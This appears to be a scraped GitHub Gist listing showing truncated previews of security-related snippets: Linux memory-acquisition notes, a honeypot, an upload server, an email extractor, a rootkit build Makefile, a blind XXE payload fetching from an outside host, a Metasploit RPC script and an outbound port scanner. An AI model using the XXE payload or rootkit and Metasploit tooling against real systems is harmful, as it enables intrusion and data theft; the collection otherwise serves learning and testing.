Dumping memory on Linux system can be cumbersome especially that the behavior might be different among different GNU/Linux distribution or Linux kernel version. In the early days, the easiest was to dump the memory from the memory device (/dev/mem) but over time the access was more and more restricted in order to avoid malicious process to directly access the kernel memory directly. The kernel option CONFIG_STRICT_DEVMEM was introduced in kernel version 2.6 and upper (2.6.36–2.6.39, 3.0–3.8, 3.8+HEAD). So you'll need to use a Linux kernel module in order to acquire memory.
omnidan
/ honeypot.py
Created
December 10, 2011 22:09
HONEYPOT.PY | A simple honeypot written in python.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| Copyright (c) 2011, Daniel Bugl | |
| All rights reserved. | |
| Redistribution and use in source and binary forms, with or without | |
| modification, are permitted provided that the following conditions are met: | |
| 1. Redistributions of source code must retain the above copyright | |
| notice, this list of conditions and the following disclaimer. | |
| 2. Redistributions in binary form must reproduce the above copyright |
UniIsland
/ SimpleHTTPServerWithUpload.py
Created
August 14, 2012 04:01
Simple Python Http Server with Upload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """Simple HTTP Server With Upload. | |
| This module builds on BaseHTTPServer by implementing the standard GET | |
| and HEAD requests in a fairly straightforward manner. | |
| """ |
adulau
/ DumpLinuxMemory.md
Created
March 5, 2013 22:03
Acquiring memory from a running Linux system (notes)
dideler
/ example.md
Last active
June 30, 2024 03:52
A python script for extracting email addresses from text files.You can pass it multiple files. It prints the email addresses to stdout, one address per line.For ease of use, remove the .py extension and place it in your $PATH (e.g. /usr/local/bin/) to run it like a built-in command.
The program below can take one or more plain text files as input. It works with python2 and python3.
Let's say we have two files that may contain email addresses:
- file_a.txt
foo bar
ok ideler.dennis@gmail.com sup
hey...user+123@example.com,wyd
hello world!
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # -*- coding: utf8 -*- | |
| import sys | |
| import os | |
| import time | |
| import select | |
| import socket | |
| import pycares |
jvns
/ Makefile
Created
October 9, 2013 01:55
A fun rootkit! See http://jvns.ca/blog/2013/10/08/day-6-i-wrote-a-rootkit/ for the story Most of the code is taken from https://github.com/mfontanini/Programs-Scripts/blob/master/rootkit/rootkit.c, so GPL'd as well
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| obj-m += rootkit.o | |
| all: | |
| make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules | |
| clean: | |
| make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
carnal0wnage
/ msgrpc_ssh_version.py
Last active
April 19, 2020 14:22
python script to connect to a metasploit msgrpc instance, setup and run an auxilary module.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| import msfrpc | |
| import time | |
| if __name__ == '__main__': | |
| # Create a new instance of the Msfrpc client with the default options | |
| client = msfrpc.Msfrpc({}) | |
| # Login to the msf server using the password "abc123" |
stenius
/ outbound_open_ports.py
Created
April 27, 2015 18:49
outbound port scan of common ports using portquiz.net
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| for x in [80, 443, 22, 21, 8080, 25, 4567, 1723, 53, 23, 3389, 110, 135, 143, | |
| 5000, 8081, 445, 139, 10000, 1863, 111, 1025, 81, 1026, 8000, 1027, 5060, | |
| 1028, 1029, 7676, 389, 1050, 113, 1024, 587, 30005, 20, 4444, 37, 27374, | |
| 5678, 56789, 1002, 18067, 30722, 554, 4664, 8594, 29860, 4]: | |
| try: | |
| r = requests.get('http://portquiz.net:%s' % x, timeout=5) | |
| except requests.exceptions.Timeout: | |
| continue |
OlderNewer